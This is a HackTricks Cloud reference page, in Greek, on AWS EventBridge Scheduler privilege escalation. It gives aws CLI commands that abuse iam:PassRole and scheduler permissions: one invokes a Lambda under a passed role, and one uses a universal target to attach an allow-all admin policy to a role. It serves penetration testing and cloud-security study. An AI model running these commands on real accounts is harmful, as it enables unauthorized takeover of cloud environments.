AWS - EventBridge Scheduler Privesc
Tip
Μάθετε & εξασκηθείτε στο AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Μάθετε & εξασκηθείτε στο Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Υποστηρίξτε το HackTricks
- Δείτε τα subscription plans!
- Εγγραφείτε στο 💬 Discord group ή την telegram group ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live.
- Μοιραστείτε τα hacking tricks υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.
EventBridge Scheduler
Περισσότερες πληροφορίες για το EventBridge Scheduler στο:
AWS - EventBridge Scheduler Enum
iam:PassRole, (scheduler:CreateSchedule | scheduler:UpdateSchedule)
Ένας attacker με αυτά τα permissions θα μπορεί να create|update έναν scheduler και να καταχραστεί τα permissions του scheduler role που επισυνάπτεται σε αυτόν για να εκτελέσει οποιαδήποτε ενέργεια
Για παράδειγμα, θα μπορούσαν να ρυθμίσουν το schedule ώστε να invoke a Lambda function το οποίο είναι μια templated action:
aws scheduler create-schedule \
--name MyLambdaSchedule \
--schedule-expression "rate(5 minutes)" \
--flexible-time-window "Mode=OFF" \
--target '{
"Arn": "arn:aws:lambda:<region>:<account-id>:function:<LambdaFunctionName>",
"RoleArn": "arn:aws:iam::<account-id>:role/<RoleName>"
}'
Εκτός από τις προτυποποιημένες ενέργειες υπηρεσίας, μπορείτε να χρησιμοποιήσετε τα universal targets στο EventBridge Scheduler για να καλέσετε ένα ευρύ φάσμα λειτουργιών API για πολλές υπηρεσίες AWS. Τα universal targets προσφέρουν ευελιξία για να καλείτε σχεδόν οποιοδήποτε API. Ένα παράδειγμα είναι η χρήση universal targets για την προσθήκη της πολιτικής AdminAccessPolicy, χρησιμοποιώντας έναν ρόλο που έχει την πολιτική putRolePolicy:
aws scheduler create-schedule \
--name GrantAdminToTargetRoleSchedule \
--schedule-expression "rate(5 minutes)" \
--flexible-time-window "Mode=OFF" \
--target '{
"Arn": "arn:aws:scheduler:::aws-sdk:iam:putRolePolicy",
"RoleArn": "arn:aws:iam::<account-id>:role/RoleWithPutPolicy",
"Input": "{\"RoleName\": \"TargetRole\", \"PolicyName\": \"AdminAccessPolicy\", \"PolicyDocument\": \"{\\\"Version\\\": \\\"2012-10-17\\\", \\\"Statement\\\": [{\\\"Effect\\\": \\\"Allow\\\", \\\"Action\\\": \\\"*\\\", \\\"Resource\\\": \\\"*\\\"}]}\"}"
}'
Αναφορές
- https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-templated.html
- https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-universal.html
Tip
Μάθετε & εξασκηθείτε στο AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Μάθετε & εξασκηθείτε στο Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Υποστηρίξτε το HackTricks
- Δείτε τα subscription plans!
- Εγγραφείτε στο 💬 Discord group ή την telegram group ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live.
- Μοιραστείτε τα hacking tricks υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.
HackTricks Cloud

